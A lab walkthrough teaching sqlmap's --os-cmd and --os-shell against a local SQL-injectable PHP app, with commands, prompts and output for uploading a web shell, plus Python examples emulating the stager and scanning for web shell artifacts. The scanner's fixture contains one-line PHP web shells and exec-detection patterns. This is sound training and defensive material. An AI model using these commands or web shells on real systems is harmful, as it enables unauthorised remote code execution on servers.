Gain an Interactive OS Shell with sqlmap


Introduction

In this lab, you will learn how to use sqlmap, a popular open-source penetration testing tool, to escalate a SQL injection vulnerability into an interactive operating system shell. sqlmap is best known for enumerating and exfiltrating data from databases, but when the back-end DBMS is able to write files or run commands, the same injection point can be used to execute commands on the server that hosts it.

We will focus on the --os-shell feature. On a PHP target like this one, sqlmap uses the injection to write a small web shell (a "stager") into the web server's document root and then sends your commands to that file over HTTP, giving you a prompt whose commands run on the remote system. A simple web application vulnerable to SQL injection has been set up and is running on your local machine for this lab.

Confirm OS Command Execution is Possible

In this step, before attempting to get a full interactive shell, we will first verify that commands can be executed on the target operating system. This is a crucial preliminary check: it exercises the same upload-and-execute mechanism that --os-shell relies on, so if it fails you know the problem lies in the environment (DBMS privileges, an unwritable or unreachable directory) rather than in the shell itself. We can achieve this with the --os-cmd flag, which instructs sqlmap to execute a single specified command and print its output.

We will use the whoami command, which prints the effective username of the process that ran it; here that is the account the web server (and therefore the uploaded stager) runs as. We will also use the --batch flag so that sqlmap accepts its default answer to every interactive question, which makes the run faster and non-interactive.

Execute the following command in your terminal:

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="whoami" --batch

You will see a lot of output as sqlmap tests the target. Wait for it to complete. Towards the end of the output, you should see the result of the whoami command.

...
[22:10:30] [INFO] fetching command output
[22:10:30] [INFO] retrieved: 'labex\n'
...
command execution stdout:
labex
...

The output labex confirms that we can successfully execute commands on the remote server as the user labex. Note what that user is: it is the account the web server process runs under, not the database administrator and not root, so everything you do from here on is bounded by that account's filesystem and process permissions.

Use the --os-shell Flag to Request an Interactive Shell

Now that we have confirmed OS command execution is possible, we can prepare the command for a full interactive shell with more confidence.

The sqlmap flag for this is --os-shell. When this flag is used, sqlmap will attempt to upload a "stager," a small piece of code (in this case, a PHP web shell), to a directory on the web server that is both writable through the database and reachable over HTTP. Each command you type is then sent to that file as an HTTP request and executed on the server, which is what gives you an interactive command shell. This only works when the back-end DBMS and the privileges of its database account allow writing files (or, for some DBMSs such as Microsoft SQL Server, running commands directly); without that, --os-shell fails no matter how reliable the injection is.

The command we will use is:

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-shell

When you run this command in the next step, sqlmap will guide you through a few prompts to determine the best way to upload the stager. We will not run the command in this step, but simply understand its purpose.

Execute the Command to Spawn the Shell

In this step, you will execute the command to spawn the interactive shell. sqlmap will ask for your input to determine the web application's language and the server's document root (the main folder for the website).

First, run the command in your terminal:

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-shell

sqlmap will start and may ask you a few questions.

  1. It might ask about the back-end DBMS and the web application language. You can press Enter to accept the defaults: sqlmap has usually already fingerprinted the DBMS, and PHP, its default language, matches this target.

  2. It will then ask for the web server document root. This is a critical step: the directory you give must be one the database can write a file into and that the web server actually serves, otherwise the stager is either never written or never reachable and sqlmap will warn that it was unable to upload it. The default it suggests (/var/www/html) is where a stock Apache install keeps its files, but this lab's application lives elsewhere. Based on our setup script, the correct path is /home/labex/project/vulnerable_app. The exact prompt wording varies between sqlmap versions; in this lab it looks like this:

    [?] what is the web server document root? [/var/www/html] >
    

    Type the following path and press Enter:

    /home/labex/project/vulnerable_app

After you provide the path, sqlmap will attempt to upload the stager. If successful, you will see messages indicating the upload and will be dropped into a new prompt: os-shell>.

...
[22:15:45] [INFO] trying to upload stager shell to '/home/labex/project/vulnerable_app'
[22:15:45] [INFO] uploading stager shell to '/home/labex/project/vulnerable_app/tmpueyge.php'
[22:15:45] [INFO] stager shell uploaded
os-shell>

This os-shell> prompt is your interactive shell on the remote server.

Interact with the Remote System via the sqlmap Shell Prompt

In this step, you will interact with the remote system using the os-shell> prompt you've just gained. This prompt is not your local terminal: every line you type is sent by sqlmap as an HTTP request to the web shell it uploaded, executed on the remote server in a new process started from the document root, and the output is returned to you. Keep that model in mind; it explains why the working directory reported below is the upload directory, and why shell state such as a changed directory does not carry over from one line to the next.

Let's run a couple of simple commands to verify our access.

First, find out the present working directory on the remote server by typing pwd and pressing Enter.

os-shell> pwd

The output should be the directory where sqlmap uploaded its stager file.

/home/labex/project/vulnerable_app

Next, confirm your user identity on the remote system again by typing whoami.

os-shell> whoami

The output should once again be labex.

labex

You have now successfully executed commands interactively on the target system.

Execute Multiple Commands and Explore the Filesystem

In this step, you will perform further exploration of the remote filesystem. An interactive shell is powerful because it allows you to navigate directories, view files, and understand the server's layout.

First, list the contents of the current directory (/home/labex/project/vulnerable_app) in long format using the ls -l command.

os-shell> ls -l

You will see the files in this directory, including index.php, users.db, and the temporary PHP web shell uploaded by sqlmap (e.g., tmpueyge.php).

total 20
-rw-r--r-- 1 labex labex  539 Dec 10 22:05 index.php
-rw-r--r-- 1 labex labex   45 Dec 10 22:15 tmpueyge.php
-rw-r--r-- 1 labex labex 12288 Dec 10 22:05 users.db

Now, let's look at the parent directory (/home/labex/project). A natural first attempt is cd ..:

os-shell> cd ..

You won't see any output, but nothing has changed on the remote side either: every os-shell> line is sent to the uploaded web shell as its own HTTP request and run in a fresh process, so a cd on one line does not carry over to the next. If you run ls now, you will still get the contents of /home/labex/project/vulnerable_app. To work in another directory, chain the directory change and the command on one line:

os-shell> cd .. && ls

You should see the vulnerable_app directory listed.

vulnerable_app

You are now free to explore the filesystem within the permissions of the labex user; the same chaining (cd /some/dir && command) applies wherever you need a different working directory. To exit the sqlmap shell and return to your normal terminal, simply type exit and press Enter. After exiting, check the document root: sqlmap tries to remove the PHP files it uploaded, but an interrupted session or a failed delete leaves a working web shell on the server, so on a real engagement verify and remove any leftovers yourself as part of cleanup.
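The request-per-command model behind the os-shell> prompt is easy to get wrong, so here is an added example (not sqlmap's code and not part of the lab) that reproduces it locally. FakeStager stands in for the PHP file sqlmap uploads: each handle_request call is one "HTTP request" carrying the typed line, which is run with the same " 2>&1" suffix the stager appends, in a fresh shell whose working directory is the document root. The temporary directory, the placeholder index.php and the tmpbdemo.php name in the request log are all constructed for the example. Running demo() shows the naive cd .. / pwd pair landing back in the docroot, and the chained cd .. && ls returning vulnerable_app as in the lab.

```python
"""Emulation of the request-per-command loop behind sqlmap's os-shell.

Added example for this lab; this is not sqlmap's code. sqlmap uploads a PHP
web shell into the document root and turns every os-shell> line into one
HTTP request to it; the PHP side runs that line with system(), appending
" 2>&1" so stderr comes back too, in a fresh process whose working
directory is the web server's. FakeStager reproduces that locally so the
consequence is visible: state such as the current directory never survives
from one request to the next.
"""
import os
import subprocess
import tempfile
from pathlib import Path


class FakeStager:
    """Stand-in for the uploaded web shell; one handle_request() == one HTTP request."""

    def __init__(self, docroot):
        self.docroot = docroot
        self.request_log = []  # what the web server's access log would record

    def handle_request(self, cmd):
        # Hypothetical file name; sqlmap picks a random tmp*.php name at run time.
        self.request_log.append(f"GET /tmpbdemo.php?cmd={cmd}")
        proc = subprocess.run(
            cmd + " 2>&1",       # same redirection the PHP stager appends
            shell=True,
            cwd=self.docroot,    # every request starts in the docroot again
            capture_output=True,
            text=True,
        )
        return proc.stdout


def os_shell_session(stager, lines):
    """Replay a list of os-shell> lines the way sqlmap does: one request per line."""
    return [stager.handle_request(line).strip() for line in lines]


def make_demo_docroot():
    """Constructed stand-in for /home/labex/project/vulnerable_app."""
    project = tempfile.mkdtemp(prefix="project_")
    app = Path(project) / "vulnerable_app"
    app.mkdir()
    (app / "index.php").write_text("<?php /* placeholder for the lab app */ ?>\n")
    return str(app)


def demo():
    docroot = os.path.realpath(make_demo_docroot())
    stager = FakeStager(docroot)
    # Naive session: cd .. on its own line, then pwd on the next line.
    naive = os_shell_session(stager, ["pwd", "cd ..", "pwd"])
    # Working session: the directory change and the command share one request.
    chained = os_shell_session(stager, ["cd .. && pwd", "cd .. && ls"])
    return {
        "docroot": docroot,
        "parent": os.path.dirname(docroot),
        "naive": naive,      # ['<docroot>', '', '<docroot>']
        "chained": chained,  # ['<parent>', 'vulnerable_app']
        "requests": stager.request_log,
    }


if __name__ == "__main__":
    result = demo()
    for key in ("naive", "chained", "requests"):
        print(key, result[key])
```

The request log is worth a look too: it is exactly what lands in the web server's access log during a real session, one line per command, with the command visible in the query string.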

Summary

In this lab, you successfully escalated a SQL injection vulnerability to gain full command-line access to a remote server. You have learned how to:

  • Use sqlmap's --os-cmd flag to confirm that OS command execution is possible.
  • Employ the --os-shell flag to instruct sqlmap to establish an interactive shell.
  • Provide necessary information, like the web server's document root, to facilitate the upload of a web shell.
  • Interact with the remote system by executing commands like pwd, whoami, ls, and cd through the sqlmap shell.

This exercise demonstrates the critical security risk posed by SQL injection vulnerabilities: beyond data theft, an injection against a database that can write files or run commands gives an attacker code execution on the host as the service account, which is typically the first step towards a complete system compromise.
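For the defender's side of this lab, the following is an added example (not sqlmap's code and not part of the lab environment) that looks for the two traces an --os-shell session leaves behind: PHP files in the document root that pass a request parameter into a command-execution function, which is what sqlmap's uploaded stager and backdoor do, and web server log lines that request such files or carry a cmd= parameter. The file-name pattern assumes sqlmap's default naming (tmpu<four letters> for the stager, tmpb<four letters> for the backdoor, matching the tmpueyge.php seen in the lab); the fixture files, their simplified contents and the access-log lines are constructed for the example.

```python
"""Defender-side check for sqlmap --os-shell artifacts.

Added example for this lab, not part of sqlmap or the lab environment. It
scans a document root for PHP files that look like web shells and a web
server access log for requests to them. The fixture and log lines below
are constructed to mirror the lab's session.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# sqlmap's default naming for the files it uploads: tmpu<4 letters> (stager)
# and tmpb<4 letters> (backdoor). Treat as a hint only; files can be renamed.
SQLMAP_TMP_NAME = re.compile(r"^tmp[ub][a-z]{4}\.(php|asp|aspx|jsp)$")
REQUEST_INPUT = re.compile(r"\$_(REQUEST|GET|POST)\b")
EXEC_CALL = re.compile(r"\b(system|shell_exec|passthru|exec|proc_open|popen)\s*\(")
# Request field of an Apache/nginx combined log line: method, script path, query.
REQUEST_FIELD = re.compile(r'"(?:GET|POST) (/[^ ?"]*\.php)(\?[^ "]*)? HTTP/')


def scan_docroot(docroot, now=None):
    """Return [(relative path, [reasons])] for PHP files that look like web shells."""
    now = time.time() if now is None else now
    findings = []
    for path in sorted(Path(docroot).rglob("*.php")):
        reasons = []
        if SQLMAP_TMP_NAME.match(path.name):
            reasons.append("sqlmap-style temporary file name")
        text = path.read_text(errors="replace")
        if REQUEST_INPUT.search(text) and EXEC_CALL.search(text):
            reasons.append("request parameter reaches a command-execution function")
        if reasons:
            age = int(now - path.stat().st_mtime)
            reasons.append(f"modified {age}s ago")
            findings.append((str(path.relative_to(docroot)), reasons))
    return findings


def scan_access_log(lines):
    """Return log lines that hit an sqlmap-named file or pass cmd= to any PHP script."""
    hits = []
    for line in lines:
        m = REQUEST_FIELD.search(line)
        if not m:
            continue
        script, query = os.path.basename(m.group(1)), m.group(2) or ""
        if SQLMAP_TMP_NAME.match(script) or re.search(r"[?&]cmd=", query):
            hits.append(line)
    return hits


def make_fixture():
    """Constructed document root mirroring the lab listing plus a dropped backdoor."""
    root = tempfile.mkdtemp(prefix="vulnerable_app_")
    files = {
        # The lab's injectable page: uses $_GET but runs no OS command, so not a shell.
        "index.php": '<?php $db = new SQLite3("users.db");\n'
                     '$r = $db->query("SELECT name FROM users WHERE id = " . $_GET["id"]); ?>\n',
        "users.db": "",
        # Simplified stand-ins for what sqlmap uploads (the real stager is longer).
        "tmpueyge.php": '<?php $c = $_REQUEST["cmd"]; system($c . " 2>&1"); ?>\n',
        "tmpbqwer.php": '<?php echo shell_exec($_GET["cmd"] . " 2>&1"); ?>\n',
    }
    for name, body in files.items():
        Path(root, name).write_text(body)
    return root


ACCESS_LOG = [  # constructed combined-format lines following the lab's timeline
    '127.0.0.1 - - [10/Dec/2024:22:10:30 +0000] "GET /index.php?id=1 HTTP/1.1" 200 539 "-" "sqlmap/1.8"',
    '127.0.0.1 - - [10/Dec/2024:22:15:45 +0000] "POST /tmpueyge.php HTTP/1.1" 200 45 "-" "sqlmap/1.8"',
    '127.0.0.1 - - [10/Dec/2024:22:16:01 +0000] "GET /tmpbqwer.php?cmd=whoami HTTP/1.1" 200 6 "-" "sqlmap/1.8"',
    '127.0.0.1 - - [10/Dec/2024:22:16:05 +0000] "GET /tmpbqwer.php?cmd=ls%20-l HTTP/1.1" 200 210 "-" "sqlmap/1.8"',
]


def demo():
    """Scan the constructed fixture; returns (file findings, log hits)."""
    docroot = make_fixture()
    return scan_docroot(docroot), scan_access_log(ACCESS_LOG)


if __name__ == "__main__":
    files, hits = demo()
    for name, reasons in files:
        print(name, "->", "; ".join(reasons))
    for line in hits:
        print("LOG:", line)
```

The content check, not the file name, is the signal to rely on: the injectable index.php also reads $_GET but is correctly left alone, while a renamed copy of the stager would still be caught because request input flows into system(). The log check is deliberately independent of the User-Agent, since sqlmap's default one is trivially replaced with --random-agent.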